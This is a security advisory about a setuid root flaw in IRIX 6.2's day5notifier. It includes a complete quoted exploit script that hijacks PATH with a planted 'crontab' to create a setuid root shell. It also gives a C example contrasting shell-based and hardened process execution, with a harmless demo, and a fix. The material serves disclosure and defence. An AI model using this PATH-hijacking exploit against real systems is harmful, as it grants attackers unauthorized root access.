COMMAND

    /var/www/htdocs/WhatsNew/CustReg/day5notifier

SYSTEMS AFFECTED

    IRIX 6.2

PROBLEM

    This bug only works on 6.2 (as far as it is known), but 6.2 is
    still the only OS available for Indys. It also points out a flaw
    in quite a few other SGI programs. Credit goes to Mike Neuman.
    His exploit had comments; I stripped those and put it below.

    The bug is contained within the following program:

        /var/www/htdocs/WhatsNew/CustReg/day5notifier

    "This program is apparently  installed by default under  IRIX 6.2.
    It may appear  in the other  setuid root program  (day5datacopier)
    there, but I haven't had the time to check."

    "SGI is apparently trying to do the right thing (by using execv()
    instead of system()), but apparently some engineer decided that
    execv() was too limited in capabilities, so he/she translated
    system() to:

        execve("/sbin/sh", "sh", "-c", "command...")

    This completely eliminates any security benefits execv() had!"

    "The program probably should not be setuid root. There are at
    least another dozen potential security vulnerabilities (i.e.
    _RLD_* variables, race conditions, etc.) found just by looking at
    strings."

    "Note  crontab  and  ps  are  only  two of the problems. There are
    probably others."

    #!/bin/sh
    # reg4root - Register me for Root!
    #
    # Exploit a bug in SGI's Registration Software
    #
    # -Mike Neuman
    # mcn@EnGarde.com
    # 8/6/96

    MYPWD=`pwd`
    mkdir /tmp/emptydir.$$
    cd /tmp/emptydir.$$

    cat <<EOF >crontab
    cp /bin/sh ./suidshell
    chmod 4755 suidshell
    EOF
    chmod +x crontab

    PATH=.:$PATH
    export PATH

    /var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0

    ./suidshell

    cd $MYPWD
    rm -rf /tmp/emptydir.$$
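    The pattern Neuman describes (system() rebuilt on top of "sh -c",
    inheriting the caller's PATH and environment) next to a hardened
    form, as an added C example that is neither SGI's code nor part of
    Neuman's exploit. It assumes /bin/sh and a writable /tmp, and stands
    in for the real crontab invocation with a constructed script that
    only exits 42.

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>
extern char **environ;
/* Reap the child; return its exit status, or -1 on any failure. */
static int wait_status(pid_t pid) {
    int st;
    if (pid < 0 || waitpid(pid, &st, 0) < 0 || !WIFEXITED(st)) return -1;
    return WEXITSTATUS(st);
}

/* VULNERABLE: system() rewritten as execve("/sbin/sh","sh","-c",cmd), as the
 * advisory describes. sh resolves "crontab" through the inherited PATH. */
int run_via_shell(const char *cmdline) {
    pid_t pid = fork();
    if (pid == 0) {
        char *const av[] = { "sh", "-c", (char *)cmdline, NULL };
        execve("/bin/sh", av, environ);     /* /sbin/sh on IRIX */
        _exit(127);
    }
    return wait_status(pid);
}

/* HARDENED: no shell, absolute path only, and a fixed minimal environment
 * (no inherited PATH or _RLD_* variables reach the child). */
int run_direct(const char *path, char *const argv[]) {
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    if (path[0] != '/') return -1;          /* never a PATH lookup */
    pid_t pid = fork();
    if (pid == 0) {
        execve(path, argv, clean_env);
        _exit(127);
    }
    return wait_status(pid);
}

/* Demo: plant ./crontab (constructed, it only exits 42) and put "." first in
 * PATH, the setup the exploit script above uses, then call both variants. */
int demo(int *hijacked, int *rejected) {
    char dir[] = "/tmp/suiddemo.XXXXXX", *const av[] = { "crontab", "-l", NULL };
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    int fd = open("crontab", O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0 || write(fd, "#!/bin/sh\nexit 42\n", 18) != 18 || close(fd) != 0) return -1;
    setenv("PATH", ".:/usr/bin:/bin", 1);
    *hijacked = run_via_shell("crontab");   /* 42: the planted file ran */
    *rejected = run_direct("crontab", av);  /* -1: relative path refused */
    unlink("crontab");
    if (chdir("/") == 0) rmdir(dir);
    return 0;
}
```

    The same sanitized-environment rule is what closes the _RLD_*
    variable problem the advisory mentions, since the dynamic loader in
    the child never sees the caller's environment.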

SOLUTION

    Still another IRIX suid problem. Still another quick fix: remove
    the suid bit from day5notifier (and check day5datacopier while you
    are at it). Still IRIX only.